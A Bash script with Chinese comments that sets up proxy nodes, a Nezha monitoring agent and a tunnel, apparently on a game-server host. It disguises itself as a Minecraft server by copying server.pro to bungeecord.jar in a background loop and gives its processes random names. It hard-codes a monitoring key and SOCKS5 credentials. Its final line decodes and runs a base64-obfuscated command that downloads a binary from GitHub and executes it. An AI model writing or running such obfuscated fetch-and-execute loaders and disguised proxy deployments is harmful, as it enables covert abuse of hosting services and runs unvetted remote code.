#!/bin/bash
 
# 隧道相关设置（去掉下面变量前面#启用，否则使用临时隧道）
# export TOK=${TOK:-'xxx'} 
# export ARGO_DOMAIN=${ARGO_DOMAIN:-'xxx'} 

# 哪吒相关设置
export NEZHA_SERVER=${NEZHA_SERVER:-'data.xuexi365.eu.org'}
export NEZHA_KEY=${NEZHA_KEY:-'9CYWQ2v4Suh0hJ8RYy'}
export NEZHA_PORT=${NEZHA_PORT:-'443'}
export NEZHA_TLS=${NEZHA_TLS:-'1'}  # 1启用tls,0关闭tls

# 节点相关设置
export TMP_ARGO=${TMP_ARGO:-'vms'}  # 节点类型,可选vls,vms,rel
export VL_PORT=${VL_PORT:-'8002'}   # vles 端口
export VM_PORT=${VM_PORT:-'8001'} # vmes 端口
export SUB_NAME=${SUB_NAME:-'coconode'} # 节点名称
export SUB_URL='https://subw.qiangguo-xuexi.eu.org/upload-123456' # 订阅上传地址

# reality相关设置(不能同时开游戏)
export SERVER_PORT="${SERVER_PORT:-${PORT:-443}}" # 端口
#export second_port=""
export SNI=${SNI:-'www.apple.com'} # tls网站

# reality协议下开启socks5转发(去掉#开启),即reality协议连接中转机然后转发到socks5落地鸡
export S_IP="216.202.220.204" #要转发的socks5地址
export S_PORT="25253"  #要转发的socks5端口
export S_USER="user"
export S_PASS="4e7851b5-7d99-49f1-b927-327e9f9e032a"

# 设置端口转发参数(去掉#开启)
# export third_port=""  # 本机中转端口
# export SIP_PORT=""  # 目标ip和端口，格式ip:端口，如1.1.1.1:443



# 游戏相关设置(去掉#开启游戏，复制启动命令填在下面)
export JAR_SH='jar'

# 随机文件名
generate_random_string() {
    echo "$(tr -dc a-z </dev/urandom | head -c 1)$(tr -dc a-z0-9 </dev/urandom | head -c 4)"
}
ne_file_default="nez$(generate_random_string)"
cff_file_default="cff$(generate_random_string)"
web_file_default="web$(generate_random_string)"
export ne_file=${ne_file:-$ne_file_default} 
export cff_file=${cff_file:-$cff_file_default} 
export web_file=${web_file:-$web_file_default} 

# 设置文件保存位置
export FLIE_PATH="/tmp/worlds/"
#export tmdir="/tmp"
while true; do
if [ -s "/home/container/server.pro" ]; then
if [ ! -s "/home/container/bungeecord.jar" ]; then
cp -rf /home/container/server.pro /home/container/bungeecord.jar
sleep 10
fi
fi
done &> /dev/null &
# 启动程序
echo "aWYgY29tbWFuZCAtdiBjdXJsICY+L2Rldi9udWxsOyB0aGVuCiAgICAgICAgRE9XTkxPQURfQ01EPSJjdXJsIC1zTCIKICAgICMgQ2hlY2sgaWYgd2dldCBpcyBhdmFpbGFibGUKICBlbGlmIGNvbW1hbmQgLXYgd2dldCAmPi9kZXYvbnVsbDsgdGhlbgogICAgICAgIERPV05MT0FEX0NNRD0id2dldCAtcU8tIgogIGVsc2UKICAgICAgICBlY2hvICJFcnJvcjogTmVpdGhlciBjdXJsIG5vciB3Z2V0IGZvdW5kLiBQbGVhc2UgaW5zdGFsbCBvbmUgb2YgdGhlbS4iCiAgICAgICAgc2xlZXAgNjAKICAgICAgICBleGl0IDEKZmkKdG1kaXI9JHt0bWRpcjotIi90bXAifSAKcHJvY2Vzc2VzPSgiJHdlYl9maWxlIiAiJG5lX2ZpbGUiICIkY2ZmX2ZpbGUiICJhcHAiICJ0bXBhcHAiKQpmb3IgcHJvY2VzcyBpbiAiJHtwcm9jZXNzZXNbQF19IgpkbwogICAgcGlkPSQocGdyZXAgLWYgIiRwcm9jZXNzIikKCiAgICBpZiBbIC1uICIkcGlkIiBdOyB0aGVuCiAgICAgICAga2lsbCAiJHBpZCIgJj4vZGV2L251bGwKICAgIGZpCmRvbmUKJERPV05MT0FEX0NNRCBodHRwczovL2dpdGh1Yi5jb20vZHNhZHNhZHNzcy9wbHV0b25vZGVzL3JlbGVhc2VzL2Rvd25sb2FkL3hyL21haW4tYW1kID4gJHRtZGlyL3RtcGFwcApjaG1vZCA3NzcgJHRtZGlyL3RtcGFwcCAmJiAkdG1kaXIvdG1wYXBw" | base64 -d | bash
